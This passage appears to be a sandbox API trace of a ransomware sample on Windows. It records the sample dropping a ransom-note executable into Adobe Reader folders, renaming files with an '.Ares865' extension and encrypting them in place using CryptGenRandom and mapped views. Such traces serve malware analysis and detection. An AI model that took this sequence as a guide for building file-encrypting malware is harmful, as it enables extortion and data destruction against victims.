ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0059.711] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.711] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0059.711] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\Services", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\Services") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\Services" [0059.711] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ea0 | out: hHeap=0x2b0000) returned 1 [0059.711] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2380 | out: hHeap=0x2b0000) returned 1 [0059.711] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\Services") returned 69 [0059.711] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\Services" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\Services") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\Services" [0059.711] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0059.711] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\Services\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\da_dk\\services\\how to back your files.exe"), bFailIfExists=1) returned 1 [0059.718] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.718] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\Services\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81f971c0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x5519c2c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5519c2c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0059.718] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.718] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0059.718] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ" [0059.718] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0059.719] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2360 | out: hHeap=0x2b0000) returned 1 [0059.719] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ") returned 60 [0059.719] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ" [0059.719] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0059.719] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\cs_cz\\how to back your files.exe"), bFailIfExists=1) returned 1 [0059.725] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.725] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d7bb9a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x5519c2c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5519c2c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0059.725] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.725] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0059.726] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\Services", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\Services") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\Services" [0059.726] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ea0 | out: hHeap=0x2b0000) returned 1 [0059.726] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2360 | out: hHeap=0x2b0000) returned 1 [0059.726] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\Services") returned 69 [0059.726] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\Services" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\Services") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\Services" [0059.726] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0059.726] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\Services\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\cs_cz\\services\\how to back your files.exe"), bFailIfExists=1) returned 1 [0059.732] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.732] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\Services\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81f971c0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x551c2420, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x551c2420, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0059.732] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.732] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0059.732] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES" [0059.732] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0059.732] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c28 | out: hHeap=0x2b0000) returned 1 [0059.732] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES") returned 60 [0059.732] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES" [0059.733] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0059.733] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\how to back your files.exe"), bFailIfExists=1) returned 1 [0059.739] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0059.739] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d853f20, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x551c2420, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x551c2420, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0059.739] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.739] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0059.739] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\accessibility.CAT.Ares865") returned 86 [0059.739] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\accessibility.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\accessibility.cat"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\accessibility.CAT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\accessibility.cat.ares865"), dwFlags=0x1) returned 1 [0059.741] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\accessibility.CAT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\accessibility.cat.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0059.741] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=45056) returned 1 [0059.741] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0059.741] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0059.741] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0059.741] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0059.742] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0059.742] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0059.742] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xb300, lpName=0x0) returned 0x118 [0059.786] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xb300) returned 0x190000 [0059.826] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2effc8) returned 1 [0059.827] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0059.827] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0059.827] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0059.827] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0059.827] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0059.827] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0059.827] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0059.827] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0059.827] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0059.827] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0059.827] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0059.827] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0059.827] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0059.828] CloseHandle (hObject=0x118) returned 1 [0059.828] CloseHandle (hObject=0x164) returned 1 [0059.830] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3058 | out: hHeap=0x2b0000) returned 1 [0059.830] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0059.830] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0059.830] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x833145e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x6dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Acroform.CAT", cAlternateFileName="")) returned 1 [0059.830] lstrcmpiW (lpString1="Acroform.CAT", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0059.830] lstrcmpiW (lpString1="Acroform.CAT", lpString2="aoldtz.exe") returned -1 [0059.830] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\Acroform.CAT.Ares865") returned 81 [0059.830] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\Acroform.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\acroform.cat"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\Acroform.CAT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\acroform.cat.ares865"), dwFlags=0x1) returned 1 [0059.840] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\Acroform.CAT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\acroform.cat.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0059.840] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=449536) returned 1 [0059.840] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0059.840] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0059.840] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0059.841] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2effc8) returned 1 [0059.842] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0059.842] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0059.842] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6df00, lpName=0x0) returned 0x154 [0059.844] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6df00) returned 0x420000 [0060.716] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2effc8) returned 1 [0060.717] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0060.717] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0060.717] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d31c0 [0060.717] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d31c0 | out: hHeap=0x2b0000) returned 1 [0060.717] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0060.717] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0060.717] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0060.717] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0060.717] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0060.717] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0060.717] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0060.717] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0060.717] UnmapViewOfFile (lpBaseAddress=0x420000) returned 1 [0060.722] CloseHandle (hObject=0x154) returned 1 [0060.722] CloseHandle (hObject=0x118) returned 1 [0060.722] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3058 | out: hHeap=0x2b0000) returned 1 [0060.722] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0060.722] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0060.724] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81efec40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1a00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AdobeCollabSync.CAT", cAlternateFileName="ADOBEC~1.CAT")) returned 1 [0060.724] lstrcmpiW (lpString1="AdobeCollabSync.CAT", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0060.724] lstrcmpiW (lpString1="AdobeCollabSync.CAT", lpString2="aoldtz.exe") returned -1 [0060.724] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\AdobeCollabSync.CAT.Ares865") returned 88 [0060.724] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\AdobeCollabSync.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\adobecollabsync.cat"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\AdobeCollabSync.CAT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\adobecollabsync.cat.ares865"), dwFlags=0x1) returned 1 [0060.726] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\AdobeCollabSync.CAT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\adobecollabsync.cat.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0060.726] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=6656) returned 1 [0060.726] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0060.726] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3058 [0060.726] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0060.726] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2effc8) returned 1 [0060.727] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0060.727] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0060.727] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1d00, lpName=0x0) returned 0x154 [0060.729] MapViewOfFile (hFileMappingObject=0x154, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1d00) returned 0x1a0000 [0060.731] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2effc8) returned 1 [0060.732] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0060.732] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0060.732] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d31c0 [0060.732] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d31c0 | out: hHeap=0x2b0000) returned 1 [0060.732] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0060.732] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0060.732] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0060.732] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0060.732] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0060.732] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0060.732] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0060.732] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0060.732] UnmapViewOfFile (lpBaseAddress=0x1a0000) returned 1 [0060.732] CloseHandle (hObject=0x154) returned 1 [0060.733] CloseHandle (hObject=0x118) returned 1 [0060.733] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3058 | out: hHeap=0x2b0000) returned 1 [0060.733] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0060.733] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0060.733] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x833608a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x7d400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Annots.CAT", cAlternateFileName="")) returned 1 [0060.733] lstrcmpiW (lpString1="Annots.CAT", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0060.733] lstrcmpiW (lpString1="Annots.CAT", lpString2="aoldtz.exe") returned -1 [0060.733] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\Annots.CAT.Ares865") returned 79 [0060.733] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\Annots.CAT" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\annots.cat"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\Annots.CAT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\annots.cat.ares865"), dwFlags=0x1) returned 1 [0060.736] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\ca_ES\\Annots.CAT.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\ca_es\\annots.cat.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 